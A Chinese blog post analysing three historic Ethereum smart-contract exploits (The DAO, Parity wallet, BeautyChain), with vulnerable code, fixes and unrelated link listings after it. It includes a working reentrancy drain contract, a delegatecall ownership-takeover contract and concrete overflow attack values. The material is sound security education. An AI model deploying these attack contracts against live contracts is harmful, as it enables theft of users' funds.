JohnnyMartin
JohnnyMartin

以太坊合约漏洞大集锦——分析、模拟与重现

以太坊的智能合约,自 DAO以来,漏洞就没断过,觉得有必要做一下汇总,以为鉴。

1,The DAO 漏洞。

该漏洞直接导致了以太坊的分叉。应该算是最有名的明星漏洞了。
我们将源码的无关部分剔除,只剩关键代码。看模拟源码:

pragma solidity ^0.4.18;
contract TheDAO{
	//这两个函数为方便测试,额外加的,原合约中并没有。
    function getBanalce() public view returns(uint){
        return address(this).balance;
    }
    function deposit()public payable{
    }
    
    function splitDAO()public{
        withdrawRewardFor(msg.sender);
    }
    function withdrawRewardFor(address _account)public{
        uint reward = 10**17;
        if (!payOut(_account, reward))  throw;
    }
    
    function payOut(address _recipient, uint _amount) returns (bool) {
        if (_recipient.call.value(_amount)()) {//假如_recipient是一个合约地址,此调用会触发_recipient的回退函数,并且,call命令不会限制本次调用的gas。
            return true;
        } else {
            return false;
        }
    }
   
    function () public payable{ }
}

contract HackCode{
    address public daoContract;
    uint public count =  50;
    uint public n;
    function setDAO(address _addr)public{
        daoContract = _addr;
    }
    function getBanalce() public view returns(uint){
        return address(this).balance;
    }
    
    function withdraw()public{
        msg.sender.transfer(address(this).balance);
    }
    
    function setCount(uint newCount)public {
        count = newCount;
    }
    function () public payable{
        if(n < count){
            n++;// 限制递归次数,防止out of gas,那样整个递归调用链都会回滚。
            TheDAO(daoContract).splitDAO();
        }
    }
}

原因基本都写在注释里了:call方法有可能触发回退函数,并且未限制本次call的gasLimit(transfer与send会限制在2300——这个数量不足以支付一次哪怕最简单的函数调用的花费)。所以要想更正bug,只需将

if (_recipient.call.value(_amount)())

改为

if (_recipient.send(_amount))

即可。
注:黑客实际使用的攻击合约可以查得到字节码,但是源码无从获得,反编译可读性也不好,此处依照个人理解做了一个实现,如有不当之处,欢迎指正。

2,Parity 钱包

该bug是由于使用了delegatecall方法引起的,导致黑客拿到了owner权限
bug威力:黑客转移几千万美元的eth,并销毁了WalletLibrary 合约,导致一部分Wallet合约中的剩余eth(300w个)永远取不出来了。
部分源码:


contract WalletLibrary {
  modifier onlyowner {
    if (isOwner(msg.sender))
      _;
  }
  modifier onlymanyowners(bytes32 _operation) {
    if (confirmAndCheck(_operation))
      _;
  }
  modifier only_uninitialized { if (m_numOwners > 0) throw; _; }
  
  function isOwner(address _addr) constant returns (bool) {
    return m_ownerIndex[uint(_addr)] > 0;
  }
  
  function initMultiowned(address[] _owners, uint _required) only_uninitialized {
    m_numOwners = _owners.length + 1;
    m_owners[1] = uint(msg.sender);
    m_ownerIndex[uint(msg.sender)] = 1;
    for (uint i = 0; i < _owners.length; ++i)
    {
      m_owners[2 + i] = uint(_owners[i]);
      m_ownerIndex[uint(_owners[i])] = 2 + i;
    }
    m_required = _required;
  }

  function initWallet(address[] _owners, uint _required, uint _daylimit) only_uninitialized {
    initDaylimit(_daylimit);
    initMultiowned(_owners, _required);
  }
  function kill(address _to) onlymanyowners(sha3(msg.data)) external {
    suicide(_to);
  }
}

contract Wallet {
	uint public m_required;
  uint public m_numOwners;

  uint public m_dailyLimit;
  uint public m_spentToday;
  uint public m_lastDay;

  // list of owners
  uint[256] m_owners;
  address constant _walletLibrary = 0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4;
  function Wallet(address[] _owners, uint _required, uint _daylimit) {
    bytes4 sig = bytes4(sha3("initWallet(address[],uint256,uint256)"));
    address target = _walletLibrary;
    uint argarraysize = (2 + _owners.length);
    uint argsize = (2 + argarraysize) * 32;

    assembly {
      mstore(0x0, sig)
      codecopy(0x4,  sub(codesize, argsize), argsize)
      delegatecall(sub(gas, 10000), target, 0x0, add(argsize, 0x4), 0x0, 0x0)
    }
  }

  function() payable {
    if (msg.value > 0)
      Deposit(msg.sender, msg.value);
    else if (msg.data.length > 0)
      _walletLibrary.delegatecall(msg.data);
  }
}

问题出在initWallet函数这里,乍一看,有一个only_uninitialized modifier 防止多次调用。其实这里有个隐藏的漏洞:
Wallet 合约通过delegate来调用walletLibrary 合约的initWallet方法是没有问题的,only_uninitialized能够防止Wallet 多次调用initWallet。但是,如果我们构造一个Wallet2合约来调用walletLibrary 合约的initWallet方法,此时only_uninitialized读的owner是位于Wallet2中的owner——这个owner可以被任意赋值,于是Wallet2可以轻松拿到walletLibrary 中的owner权限。
黑客合约可以这样构造:

contract Wallet2 {
	uint public m_required;
  uint public m_numOwners;

  uint public m_dailyLimit;
  uint public m_spentToday;
  uint public m_lastDay;
 
  // list of owners
  uint[256] m_owners;
  mapping(uint => uint) m_ownerIndex;
  address constant _walletLibrary = 0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4;

	function attack()public{
		m_ownerIndex[this] = 1;
		 bytes4 sig = bytes4(sha3("initWallet(address[],uint256,uint256)"));
		_walletLibrary.delegatecall(sig, [this], 0, 0);//这里会顺利调用到initWallet函数,并把this设置为owner
		..........//可以为所欲为了
	}
}

根本原因在于:delegatecall调用其他合约的代码,存储仍然用的当前合约的环境,导致丧失owner权限。
教训:慎用delegatecall,因为它的行为严重与人的直觉不符,极易造成漏洞。
另外,黑客在取得了owner权限之后,拿了一些eth,然后把_walletLibrary销毁了。。。。其他人再也拿不出Wallet中剩余的eth了,浪费啊。。。

3,美图币BeautyChain (BEC)的漏洞

这个漏洞理解起来比DAO漏洞要容易得多:未进行乘法的溢出检查。
关键代码:


library SafeMath {
  function mul(uint256 a, uint256 b) internal constant returns (uint256) {
    uint256 c = a * b;
    assert(a == 0 || c / a == b);
    return c;
  }

  function div(uint256 a, uint256 b) internal constant returns (uint256) {
    // assert(b > 0); // Solidity automatically throws when dividing by 0
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold
    return c;
  }

  function sub(uint256 a, uint256 b) internal constant returns (uint256) {
    assert(b <= a);
    return a - b;
  }

  function add(uint256 a, uint256 b) internal constant returns (uint256) {
    uint256 c = a + b;
    assert(c >= a);
    return c;
  }
}

contract BeautyChain{
    using SafeMath for uint256;
    mapping (address => uint256) public balances;
    
    function batchTransfer(address[] _receivers, uint256 _value) public  returns (bool) {
        uint cnt = _receivers.length;
        uint256 amount = uint256(cnt) * _value; // <====这个乘法有可能溢出
        require(cnt > 0 && cnt <= 20);
        require(_value > 0 && balances[msg.sender] >= amount);
    
        balances[msg.sender] = balances[msg.sender].sub(amount); 
        for (uint i = 0; i < cnt; i++) {
            balances[_receivers[i]] = balances[_receivers[i]].add(_value);
        }
        return true;
      }
}

攻击者使 uint256(cnt) * _value 溢出后恰好等于0:让cnt = 2, _value = 2^128。溢出后,amount = 0,require(_value > 0 && balances[msg.sender] >= amount);可以被完美的绕过。
接下来进了for循环,就直接add(_value),而此时的value是 2^128 。。。。

发起攻击的交易:https://etherscan.io/tx/0xad89ff16fd1ebe3a0a7cf4ed282302c06626c1af33221ebe0d3a470aba4a660f

改正漏洞很简单,只需将:

uint256 amount = uint256(cnt) * _value;

改为

uint256 amount = _value.mul(uint256(cnt));

即可。

你可能感兴趣的:(BlockChain,Solidity)

  • 扫盲系列--Web3智能合约+Solidity简介 「已注销」 前端框架
    前言这几天web3智能合约这个概念,频繁映入我的眼帘。web3.0这个概念我听说过,核心特征是去中心化、开放性、隐私保护和数据所有权回归个人。Web1.0是信息浏览时代,Web2.0是用户参与和社交网络时代,Web3.0是去中心化与智能化时代。在Web3.0这一新的互联网架构下,用户不再仅仅是内容的消费者,更是自己数字身份和数据的拥有者。Web3.0旨在构建一个更加透明、安全且高效的信息网络。我对
  • Infura 简介 倒霉男孩 区块链知识区块链web3
    文章目录Infura简介Infura的主要功能Infura的替代方案(类似服务)AlchemyQuickNodeAnkrMoralisPocketNetwork什么时候选择Infura?Infura简介Infura是一个区块链基础设施即服务(BaaS,BlockchainasaService),提供高可用性的以太坊(Ethereum)节点和IPFS存储访问,让开发者可以轻松连接区块链网络,而无需自
  • Smart contract -- 自毁合约 第十六年盛夏. Solidity区块链应用搭建智能合约区块链智能合约
    在区块链开发中,Solidity语言提供了强大的功能,其中自毁合约是一个独特且重要的特性。今天,就让我们深入探讨一下Solidity中的自毁合约,以及如何使用selfdestruct函数。注意:使用继承时请确保代码的正确性,以防丢失个人财产,在这里友情提示您,不要复制来源不明的solidity代码并进行部署。本文为自己梳理总结,如有不足还请指出,感谢包容。学习更多solidity知识请访问Gith
  • Solidity基础 -- 哈希算法 第十六年盛夏. 智能合约区块链应用搭建区块链智能合约
    一、引言在当今数字化时代,数据的安全性、完整性和高效处理变得至关重要。哈希算法作为一种强大的数学工具,在计算机科学、密码学、区块链等众多领域发挥着关键作用。它为数据的存储、传输和验证提供了一种可靠的方式,极大地推动了信息技术的发展。二、哈希算法基础介绍(一)定义哈希算法(HashAlgorithm),也称为散列算法,是一种将任意长度的输入数据(也称为消息)通过特定的数学函数转换为固定长度输出的过程
  • solidity高阶 -- Eth支付 第十六年盛夏. Solidity智能合约区块链智能合约
    在区块链的世界里,智能合约是实现去中心化应用(DApp)的核心技术之一。Solidity是一种专门用于编写以太坊智能合约的编程语言,它可以帮助开发者构建各种功能,包括支付功能。今天,我们就来探讨如何使用Solidity实现以太坊主币的支付功能,以及如何通过智能合约接收和管理这些资金。注意:使用继承时请确保代码的正确性,以防丢失个人财产,在这里友情提示您,不要复制来源不明的solidity代码并进行
  • Python AES 加密和解密(qbit) pythonaes加密解密
    前言AES有多种加密模式,本文选取了最常用的CBC模式CipherBlockChaining密码块链模式技术栈Python3.11.8cryptography43.0.3loguru0.7.2示例代码导入库#encoding:utf-8#author:qbit#date:2024-10-28#summary:测试AES的加密和解密importosimportrandomimportstringfr
  • 链游开发:TON链小游戏DApp小游戏开发
    链游开发,特别是在TON链上开发小游戏与其他链(如以太坊、Solana、BSC等)上的DApp小游戏,是一个结合了区块链技术和游戏设计的复杂过程。以下是一个详细的开发指南:一、链游基本概念链游(BlockchainGames)是基于区块链技术开发的游戏,通过智能合约将游戏中的虚拟资产上链,实现真正的数字资产所有权。DApp(去中心化应用)游戏是链游的一种,利用区块链平台的智能合约来确保游戏的透明性
  • 自定义的搭建solidity开发环境(以太坊) yinzhiqing 开发环境技术文档ubuntu开发环境
    环境地址github:GitHub-yinzhiqing/templete-sol:solidityplatform(hardhat)gitlab:zqy/templete-sol·GitLab本项目利用openzapplinsolcweb3jshardhatnodejs在ubuntu下搭建solidity合约开发环境.大多数功能实现了自动化(脚本)执行.特点:1.开发环境可充分使用2.合约可升级
  • 【区块链技术开发】 关于Windows10平台Solidity语言开发环境配置 源代码杀手 区块链技术开发区块链
    目录1、安装Node.js2、安装Solidity编译器3、安装RemixIDE4、安装MetaMask浏览器插件5、环境配置与问题解决6、安装Ganache:以太坊区块链开发测试工具7、安装Web3.js库8、VsCode配置Solidity语言环境并运行示例代码编译方法1:运行上述示例只需在终端输入编译命令Solcjs编译方法2:安装Solidity插件9、在VSCode运行合约参考文献在Wi
  • Solidity开发之Foundry快速安装(Windows版) 这有一只小爪子 web3
    目录VSCode安装WSLFoundry库安装Foundry测试案例ℹ️NoteIfyou’reonWindows,youwillneedtoinstallanduseGitBASHorWSL,asyourterminal,sinceFoundryupcurrentlydoesnotsupportPowershellorCmd.官方提示:如果当前使用的Windows操作系统,可以通过WSL的方式安
  • 强大的 solidity 框架:Foundry 轻松上手 代码搬运媛 区块链
    Foundry简介Foundry是一个强大的Solidity开发框架,帮助开发者高效地构建、测试和部署智能合约。优势以solidity为第一公民,可以完全使用solidity开发与测试强大的测试功能,方便模拟各种情况,支持模糊测试使用rust语言编写,包含一系列可以与Ethereum交互的工具安装Foundryup是foundry工具包的安装器,通过它我们来完成foundry的安装,首先,在终端执
  • Solidity Foundry Boilerplate 项目教程 仰北帅Bobbie
    SolidityFoundryBoilerplate项目教程solidity-foundry-boilerplate⚒️StartyournextSolidityprojectwithFoundryinseconds项目地址:https://gitcode.com/gh_mirrors/so/solidity-foundry-boilerplate1.项目的目录结构及介绍SolidityFound
  • solenv:Solidity与Foundry的环境变量解决方案 武朵欢Nerissa
    solenv:Solidity与Foundry的环境变量解决方案solenvDotenvparserforsolidity&foundry项目地址:https://gitcode.com/gh_mirrors/so/solenv项目介绍solenv是一个专为Solidity和Foundry设计的.env文件解析器,简化了在智能合约开发中管理配置变量的过程。此开源项目允许开发者在Solidity脚本
  • Perl语言的区块链 沈韡蕙 包罗万象golang开发语言后端
    Perl语言在区块链技术中的应用引言随着区块链技术的迅猛发展,越来越多的编程语言开始在这个领域中发挥重要作用。虽然常见的区块链开发语言例如Solidity和JavaScript广受欢迎,但Perl作为一门成熟且灵活的语言,也在一些特定的应用场景中展现出其独特的优势。本文将探讨Perl语言在区块链技术中的应用,包括其特点、在区块链中的实现、案例分析以及未来展望。Perl语言的特点Perl是一种强大的
  • 公有链、私有链、联盟链的区别及架构 A&long@2020 杂谈区块链
    区块链分类“公有链”(Publicblockchain)公有链上的各个节点可以自由加入和退出网络,并参加链上数据的读写,读写时以扁平的拓扑结构互联互通,网络中不存在任何中心化的服务端节点。“私有链”(Privateblockchain)私有链中各个节点的写入权限收归内部控制,而读取权限可视需求有选择性地对外开放。专有链仍热具备区块链多节点运行的通用结构,适用于特定机构的内部数据管理与审计。“联盟链
  • AES加密工具(ECB, CBC, CMAC) 何盼思Kit
    AES加密工具(ECB,CBC,CMAC)AESTool.7z项目地址:https://gitcode.com/open-source-toolkit/49570工具简介本仓库提供了一个高效的AES加密解决方案,全面支持AES加密算法的三种工作模式:ElectronicCodebook(ECB),CipherBlockChaining(CBC)以及Cipher-basedMessageAuthen
  • The Concepts and Elements of Sui smilejiasmile 区块链从1.03.0的技术分享锦集及讲解rust区块链Suinarval
    ConceptsSuiBackgroundThistraditionalblockchainnetworkarchitecturehasalimitationinthatsuchalinearmechanismofthesystembecomesthemainbottleneckforachievinghightransactionvolumescalability.Suiblockchainpu
  • solidity 数学和密码学函数 龑行天下 密码学solidity
    数学和密码学函数为开发者提供了一系列强大的工具,用于执行各种数学运算和加密操作addmod(uintx,uinty,uintk)returns(uint)计算(x+y)%k,加法会在任意精度下执行,并且加法的结果即使超过2**256也不会被截取。从0.5.0版本的编译器开始会加入对k!=0的校验(assert)。//SPDX-License-Identifier:MITpragmasolidity
  • solidity 特殊函数 龑行天下 区块链solidity
    接收以太的函数一个合约最多可以有一个receive函数,使用receive()externalpayable{...}来声明。(没有function关键字)。这个函数不能有参数,不能返回任何东西,必须具有external的可见性和payable的状态可变性。它可以是虚拟的,可以重载,也可以有修饰器。当一个合约收到一个普通的以太币转账(没有调用合约中的任何函数)时,receive函数会被触发(如果存
  • Solidity极简入门: 9. 常数 constant和immutable hina90 智能合约solidityweb3区块链智能合约web3去中心化
    这一讲,我们介绍solidity中两个关键字,constant(常量)和immutable(不变量)。状态变量声明这个两个关键字之后,不能在合约后更改数值;并且还可以节省gas。另外,只有数值变量可以声明constant和immutable;string和bytes可以声明为constant,但不能为immutable。constant和immutableconstantconstant变量必须在
  • Smart contract -- 钱包合约 第十六年盛夏. Solidity智能合约区块链搭建和维护区块链智能合约
    在区块链的世界里,钱包是存储和管理加密货币的基本工具。今天,我们将通过Solidity智能合约来创建一个简单的以太坊钱包。这个钱包将允许用户存入和取出以太坊主币(ETH),并且只有管理员(合约的创建者)可以存入资金。我们来看看如何实现这个功能。注意:使用继承时请确保代码的正确性,以防丢失个人财产,在这里友情提示您,不要复制来源不明的solidity代码并进行部署。本文为自己梳理总结,如有不足还请指
  • solidity高阶 -- 线性继承 第十六年盛夏. Solidity智能合约区块链搭建和维护区块链智能合约
    Solidity是一种面向合约的高级编程语言,用于编写智能合约。在Solidity中,多线继承是一个强大的特性,允许合约从多个父合约继承属性和方法。本文将详细介绍Solidity中的多线继承,并通过不同的实例展示其使用方法和注意事项。在Solidity语言中,派生合约和基础合约是多线继承中的两个重要概念。它们定义了合约之间的继承关系,帮助开发者实现代码复用和功能扩展。下面将详细解释这两个概念之后我
  • Solidity/Rust 实战 —— Web3 开发者免费训练营(第 21 期)
    HackQuest第21期Solidity/Rust共学营即将开营!Solidity/Rust共学营信息清单7月23日-8月1日免费(成功结营的小伙伴还将获得专属周边)全程线上(会议具体时间入营后通知)️头部公链官方签发的学习证书主办社区:HackQuestHackQuest是一个充满活力的Web3开发者教育社区,我们的目标是培养下一代Web3开发者。目前,HackQuest组织的共学营已达20期
  • Solidity/Rust 实战 —— Web3 开发者免费训练营(第17期) 智能合约区块链以太坊比特币
    HackQuest第17期Solidity/Rust共学营即将开营!Solidity/Rust共学营信息清单6月18日-6月27日免费(成功结营的小伙伴还将获得专属周边)全程线上(会议具体时间入营后通知)️头部公链官方签发的学习证书关于HackQuestHackQuest是一个充满活力的Web3开发者教育社区,我们的目标是培养下一代Web3开发者。目前我们的产品仍处于内测阶段,我们计划招募小伙伴们
  • solidity编程-合约结构 科学发展观 读书笔记区块链编程语言
    Solidity介绍合约结构状态变量数据类型结构修改器事件枚举函数数据类型值类型合约由多个结构组成:状态变量结构定义修改器定义事件声明枚举定义函数定义合约结构状态变量编程中的变量是指可以包含值的存储单元。值可以在运行时更改。可以在代码中的多个位置使用变量,并且它们都将引用存储的值。solidity提供两种类型的变量——状态变量和内存变量。在合约中,没有在任何函数内声明的变量成为状态变量。状态变量存
  • 以太坊Solidity智能合约开发(一) - 合约结构 心辰说区块链 智能合约区块链
    以太坊Solidity智能合约开发(一)-合约结构掌握了以太坊的一些知识体系后,作为技术开发者,首先要学习的就是以太坊智能合约的开发。我们先从学习合约的开发开始,因为后面的技术栈中,我们需要用支持与以太坊交互的编程语言与以太坊交互,与合约交互,都是基于合约的代码逻辑来的,所以,接下来我们这个系列里,我们先从学会掌握solidity智能合约开发开始。我们打开智能合约在线编辑器,编辑器的具体使用我就不
  • solidity:智能合约结构介绍 FAFU_kyp #solidity智能合约区块链
    合约结构介绍1.SPDX版权声明bytecodemetadata介绍2.pragmasolidity版本限制3.contract关键字4.import导入声明5.interface:接口6.library:库合约合约结构介绍1.SPDX版权声明第1行//SPDX-License-Identifier:MIT就是合约的版权声明。其中SPDX-License-Identifier(SPDX许可标示)是
  • Web-3.0学习路线 奶龙牛牛 web3
    方向学习内容✅区块链基础区块链、智能合约、共识机制✅智能合约Solidity/Rust(Ethereum/Solana)✅前端React.js,Next.js,Web3.js,ethers.js✅后端Node.js,Python,Golang(链上数据)✅存储IPFS,Arweave,Filecoin(去中心化存储)✅交互MetaMask,WalletConnect(钱包)如果你是前端开发Reac
  • 基于Hutool的Merkle树hash值生成工具 星极天下第一 Java哈希算法算法java
    SHAUtil工具packagecom.blockchain.qgy.util;importcom.xiaoleilu.hutool.crypto.digest.DigestUtil;importorg.apache.commons.codec.binary.Hex;importjava.nio.charset.StandardCharsets;importjava.security.Messag
  • Web-3.0(Solidity)基础教程 奶龙牛牛 区块链
    Solidity是以太坊智能合约编程语言,用于编写去中心化应用(DApp)。如果你想开发Web3.0应用,Solidity是必学的。Remix-EthereumIDE(在线编写Solidity)特性RemixIDEHardhat适用场景适合初学者和小项目测试适合专业开发和大项目使用方式在线工具(浏览器)本地开发(命令行)环境无需安装,直接在线使用需要Node.js+NPM调试工具内置调试器(Deb
  • 多线程编程之join()方法 周凡杨 javaJOIN多线程编程线程
    现实生活中,有些工作是需要团队中成员依次完成的,这就涉及到了一个顺序问题。现在有T1、T2、T3三个工人,如何保证T2在T1执行完后执行,T3在T2执行完后执行?问题分析:首先问题中有三个实体,T1、T2、T3, 因为是多线程编程,所以都要设计成线程类。关键是怎么保证线程能依次执行完呢?   Java实现过程如下: public class T1 implements Runnabl
  • java中switch的使用 bingyingao javaenumbreakcontinue
    java中的switch仅支持case条件仅支持int、enum两种类型。 用enum的时候,不能直接写下列形式。 switch (timeType) { case ProdtransTimeTypeEnum.DAILY: break; default: br
  • hive having count 不能去重 daizj hive去重having count计数
    hive在使用having count()是,不支持去重计数   hive (default)> select imei from t_test_phonenum where ds=20150701 group by imei having count(distinct phone_num)>1 limit 10;  FAILED: SemanticExcep
  • WebSphere对JSP的缓存 周凡杨 WAS JSP 缓存
          对于线网上的工程,更新JSP到WebSphere后,有时会出现修改的jsp没有起作用,特别是改变了某jsp的样式后,在页面中没看到效果,这主要就是由于websphere中缓存的缘故,这就要清除WebSphere中jsp缓存。要清除WebSphere中JSP的缓存,就要找到WAS安装后的根目录。        现服务
  • 设计模式总结 朱辉辉33 java设计模式
    1.工厂模式   1.1 工厂方法模式 (由一个工厂类管理构造方法)      1.1.1普通工厂模式(一个工厂类中只有一个方法)      1.1.2多工厂模式(一个工厂类中有多个方法)      1.1.3静态工厂模式(将工厂类中的方法变成静态方法) &n
  • 实例:供应商管理报表需求调研报告 老A不折腾 finereport报表系统报表软件信息化选型
    引言 随着企业集团的生产规模扩张,为支撑全球供应链管理,对于供应商的管理和采购过程的监控已经不局限于简单的交付以及价格的管理,目前采购及供应商管理各个环节的操作分别在不同的系统下进行,而各个数据源都独立存在,无法提供统一的数据支持;因此,为了实现对于数据分析以提供采购决策,建立报表体系成为必须。 业务目标 1、通过报表为采购决策提供数据分析与支撑 2、对供应商进行综合评估以及管理,合理管理和
  • mysql 林鹤霄
    转载源:http://blog.sina.com.cn/s/blog_4f925fc30100rx5l.html mysql -uroot -p ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)   [root@centos var]# service mysql
  • Linux下多线程堆栈查看工具(pstree、ps、pstack) aigo linux
    原文:http://blog.csdn.net/yfkiss/article/details/6729364   1. pstree pstree以树结构显示进程$ pstree -p work | grep adsshd(22669)---bash(22670)---ad_preprocess(4551)-+-{ad_preprocess}(4552)  &n
  • html input与textarea 值改变事件 alxw4616 JavaScript
    // 文本输入框(input) 文本域(textarea)值改变事件 // onpropertychange(IE) oninput(w3c) $('input,textarea').on('propertychange input', function(event) {      console.log($(this).val()) });  
  • String类的基本用法 百合不是茶 String
      字符串的用法;     // 根据字节数组创建字符串 byte[] by = { 'a', 'b', 'c', 'd' }; String newByteString = new String(by);         1,length()  获取字符串的长度     &nbs
  • JDK1.5 Semaphore实例 bijian1013 javathreadjava多线程Semaphore
    Semaphore类        一个计数信号量。从概念上讲,信号量维护了一个许可集合。如有必要,在许可可用前会阻塞每一个 acquire(),然后再获取该许可。每个 release() 添加一个许可,从而可能释放一个正在阻塞的获取者。但是,不使用实际的许可对象,Semaphore 只对可用许可的号码进行计数,并采取相应的行动。 S
  • 使用GZip来压缩传输量 bijian1013 javaGZip
            启动GZip压缩要用到一个开源的Filter:PJL Compressing Filter。这个Filter自1.5.0开始该工程开始构建于JDK5.0,因此在JDK1.4环境下只能使用1.4.6。         PJL Compressi
  • 【Java范型三】Java范型详解之范型类型通配符 bit1129 java
        定义如下一个简单的范型类,   package com.tom.lang.generics; public class Generics<T> { private T value; public Generics(T value) { this.value = value; } }
  • 【Hadoop十二】HDFS常用命令 bit1129 hadoop
    1. 修改日志文件查看器   hdfs oev -i edits_0000000000000000081-0000000000000000089 -o edits.xml cat edits.xml   修改日志文件转储为xml格式的edits.xml文件,其中每条RECORD就是一个操作事务日志   2. fsimage查看HDFS中的块信息等 &nb
  • 怎样区别nginx中rewrite时break和last ronin47
    在使用nginx配置rewrite中经常会遇到有的地方用last并不能工作,换成break就可以,其中的原理是对于根目录的理解有所区别,按我的测试结果大致是这样的。 location /    {         proxy_pass http://test; 
  • java-21.中兴面试题 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等于 m bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; public class CombinationToSum { /* 第21 题 2010 年中兴面试题 编程求解: 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等
  • eclipse svn 帐号密码修改问题 开窍的石头 eclipseSVNsvn帐号密码修改
    问题描述:      Eclipse的SVN插件Subclipse做得很好,在svn操作方面提供了很强大丰富的功能。但到目前为止,该插件对svn用户的概念极为淡薄,不但不能方便地切换用户,而且一旦用户的帐号、密码保存之后,就无法再变更了。 解决思路:      删除subclipse记录的帐号、密码信息,重新输入
  • [电子商务]传统商务活动与互联网的结合 comsci 电子商务
          某一个传统名牌产品,过去销售的地点就在某些特定的地区和阶层,现在进入互联网之后,用户的数量群突然扩大了无数倍,但是,这种产品潜在的劣势也被放大了无数倍,这种销售利润与经营风险同步放大的效应,在最近几年将会频繁出现。。。。        如何避免销售量和利润率增加的
  • java 解析 properties-使用 Properties-可以指定配置文件路径 cuityang javaproperties
    #mq xdr.mq.url=tcp://192.168.100.15:61618; import java.io.IOException; import java.util.Properties; public class Test { String conf = "log4j.properties"; private static final
  • Java核心问题集锦 darrenzhu java基础核心难点
    注意,这里的参考文章基本来自Effective Java和jdk源码 1)ConcurrentModificationException 当你用for each遍历一个list时,如果你在循环主体代码中修改list中的元素,将会得到这个Exception,解决的办法是: 1)用listIterator, 它支持在遍历的过程中修改元素, 2)不用listIterator, new一个
  • 1分钟学会Markdown语法 dcj3sjt126com markdown
    markdown 简明语法 基本符号 *,-,+ 3个符号效果都一样,这3个符号被称为 Markdown符号 空白行表示另起一个段落 `是表示inline代码,tab是用来标记 代码段,分别对应html的code,pre标签 换行 单一段落( <p>) 用一个空白行 连续两个空格 会变成一个 <br> 连续3个符号,然后是空行
  • Gson使用二(GsonBuilder) eksliang jsongsonGsonBuilder
    转载请出自出处:http://eksliang.iteye.com/blog/2175473 一.概述     GsonBuilder用来定制java跟json之间的转换格式   二.基本使用 实体测试类: 温馨提示:默认情况下@Expose注解是不起作用的,除非你用GsonBuilder创建Gson的时候调用了GsonBuilder.excludeField
  • 报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList gundumw100 android
    有一个工程,本来运行是正常的,我想把它移植到另一台PC上,结果报: java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.mobovip.bgr/com.mobovip.bgr.MainActivity}: java.lang.ClassNotFoundException: Didn't f
  • JavaWeb之JSP指令 ihuning javaweb
      要点   JSP指令简介  page指令  include指令    JSP指令简介    JSP指令(directive)是为JSP引擎而设计的,它们并不直接产生任何可见输出,而只是告诉引擎如何处理JSP页面中的其余部分。 JSP指令的基本语法格式: <%@ 指令 属性名="
  • mac上编译FFmpeg跑ios 啸笑天 ffmpeg
    1、下载文件:https://github.com/libav/gas-preprocessor, 复制gas-preprocessor.pl到/usr/local/bin/下, 修改文件权限:chmod 777 /usr/local/bin/gas-preprocessor.pl 2、安装yasm-1.2.0 curl http://www.tortall.net/projects/yasm
  • sql mysql oracle中字符串连接 macroli oraclesqlmysqlSQL Server
    有的时候,我们有需要将由不同栏位获得的资料串连在一起。每一种资料库都有提供方法来达到这个目的: MySQL: CONCAT() Oracle: CONCAT(), || SQL Server: + CONCAT() 的语法如下: Mysql 中 CONCAT(字串1, 字串2, 字串3, ...): 将字串1、字串2、字串3,等字串连在一起。 请注意,Oracle的CON
  • Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate qiaolevip 学习永无止境每天进步一点点git纵观千象
    // 报错如下: $ git pull origin master fatal: unable to access 'https://git.xxx.com/': SSL certificate problem: unable to get local issuer ce rtificate   // 原因: 由于git最新版默认使用ssl安全验证,但是我们是使用的git未设
  • windows命令行设置wifi surfingll windowswifi笔记本wifi
    还没有讨厌无线wifi的无尽广告么,还在耐心等待它慢慢启动么 教你命令行设置 笔记本电脑wifi: 1、开启wifi命令 netsh wlan set hostednetwork mode=allow ssid=surf8 key=bb123456 netsh wlan start hostednetwork pause 其中pause是等待输入,可以去掉 2、
  • Linux(Ubuntu)下安装sysv-rc-conf wmlJava linuxubuntusysv-rc-conf
    安装:sudo apt-get install sysv-rc-conf 使用:sudo sysv-rc-conf 操作界面十分简洁,你可以用鼠标点击,也可以用键盘方向键定位,用空格键选择,用Ctrl+N翻下一页,用Ctrl+P翻上一页,用Q退出。     背景知识 sysv-rc-conf是一个强大的服务管理程序,群众的意见是sysv-rc-conf比chkconf
  • svn切换环境,重发布应用多了javaee标签前缀 zengshaotao javaee
    更换了开发环境,从杭州,改变到了上海。svn的地址肯定要切换的,切换之前需要将原svn自带的.svn文件信息删除,可手动删除,也可通过废弃原来的svn位置提示删除.svn时删除。   然后就是按照最新的svn地址和规范建立相关的目录信息,再将原来的纯代码信息上传到新的环境。然后再重新检出,这样每次修改后就可以看到哪些文件被修改过,这对于增量发布的规范特别有用。   检出
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他